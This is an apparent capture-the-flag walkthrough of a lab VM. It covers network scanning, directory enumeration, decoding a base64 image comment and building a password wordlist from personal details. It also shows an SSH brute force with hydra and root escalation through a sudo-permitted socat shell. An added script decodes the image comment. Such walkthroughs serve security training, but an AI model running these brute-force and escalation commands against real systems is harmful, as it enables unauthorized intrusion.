Target VM walkthrough
- arp-scan
- port
- URL enumeration
- exiftool
- nested encoding
- password
- sudo privilege escalation
arp-scan
arp-scan detects the live hosts on the local network
192.168.9.203 is the target VM's IP address
port
Scan with nmap to get the target host's port information
┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.203
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
URL enumeration
dirsearch directory scan. The default wordlist finds nothing, so a larger one is used:
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r
[07:22:28] 301 - 312B - /img -> http://192.168.9.203/img/
[07:22:33] 301 - 312B - /css -> http://192.168.9.203/css/
[07:22:36] 301 - 311B - /js -> http://192.168.9.203/js/
[07:38:24] 301 - 319B - /staffpages -> http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 - 278B - /server-status
[############ ] 60% 134151/220545 119/s job:1/1 errors:82
[5]+ 已停止 dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We get a picture; there must be something hidden in it.
wget http://192.168.9.203/staffpages/new_employees.jpg
exiftool
┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg
ExifTool Version Number : 12.49
File Name : new_employees.jpeg
Directory : .
File Size : 160 kB
File Modification Date/Time : 2023:11:27 12:11:43-05:00
File Access Date/Time : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time : 2024:05:10 05:53:33-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width : 703
Image Height : 1136
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 703x1136
Megapixels : 0.799
nested encoding
┌──(root㉿kali)-[~]
└─# echo 'ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן
After enough CTFs you spot at a glance that these are upside-down letters: message_for_michael
Visit /staffpages/message_for_michael
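As an added example (not part of the original write-up), the hand decoding above automated: walk the JPEG marker segments to pull the COM comment out directly, base64-decode it, and map the upside-down glyphs back to ASCII. The glyph table is the common upside-down-text generator set (an assumption), and the JPEG bytes are a constructed minimal file carrying the comment from the exiftool output.

```python
import base64
import struct

# Assumption: the common "upside-down text" generator glyph set. Glyphs that
# read the same either way (o, s, x, z) map to themselves; b/q, d/p and n/u swap.
FLIPPED = {
    "ɐ": "a", "q": "b", "ɔ": "c", "p": "d", "ǝ": "e", "ɟ": "f", "ƃ": "g",
    "ɥ": "h", "ı": "i", "ɾ": "j", "ʞ": "k", "ן": "l", "ɯ": "m", "u": "n",
    "o": "o", "d": "p", "b": "q", "ɹ": "r", "s": "s", "ʇ": "t", "n": "u",
    "ʌ": "v", "ʍ": "w", "x": "x", "ʎ": "y", "z": "z", "‾": "_",
}

def jpeg_comments(data: bytes) -> list:
    """Walk the JPEG marker segments before SOS and return each COM payload."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos, comments = 2, []
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):      # EOI / SOS: no more metadata segments
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]  # includes itself
        if marker == 0xFE:              # COM segment, shown by exiftool as "Comment"
            comments.append(data[pos + 4:pos + 2 + length])
        pos += 2 + length
    return comments

def unflip(text: str) -> str:
    """Map upside-down glyphs back to ASCII; unknown characters pass through."""
    return "".join(FLIPPED.get(ch, ch) for ch in text)

def decode_comment(comment: bytes) -> str:
    """'<label> : <base64>' -> base64 -> UTF-8 upside-down text -> ASCII."""
    b64 = comment.decode("ascii").rsplit(":", 1)[1].strip()
    return unflip(base64.b64decode(b64).decode("utf-8").strip())

# Constructed sample: SOI, a JFIF APP0 header, one COM segment with the page's comment, EOI.
COMMENT = b"page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo="
APP0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
SAMPLE_JPEG = (b"\xff\xd8"
               + b"\xff\xe0" + struct.pack(">H", len(APP0) + 2) + APP0
               + b"\xff\xfe" + struct.pack(">H", len(COMMENT) + 2) + COMMENT
               + b"\xff\xd9")

if __name__ == "__main__":
    for raw in jpeg_comments(SAMPLE_JPEG):
        print(raw.decode(), "->", decode_comment(raw))   # -> message_for_michael
```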
Hi Michael
Sorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.
By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file
personal_info.txt
Visit /staffpages/personal_info.txt
name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimming
password
Generate a password wordlist from the personal information
leahcim
michael
19961019
19101996
michael1996
leahcim1996
...
Brute-force SSH with hydra
┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203
[22][ssh] host: 192.168.9.203 login: michael password: leahcim1996
sudo privilege escalation
Another user's home directory is found under /home
michael@animetronic:/home$ cd henry/
michael@animetronic:/home/henry$ ls
Note.txt user.txt
michael@animetronic:/home/henry$ cat user.txt
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ cat Note.txt
if you need my account to do anything on the server,
you will find my password in file named
aGVucnlwYXNzd29yZC50eHQK
michael@animetronic:/home/henry$ echo 'aGVucnlwYXNzd29yZC50eHQK' | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam
This is henry's password
michael@animetronic:/home/henry$ su henry
Password:
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User henry may run the following commands on animetronic:
(root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a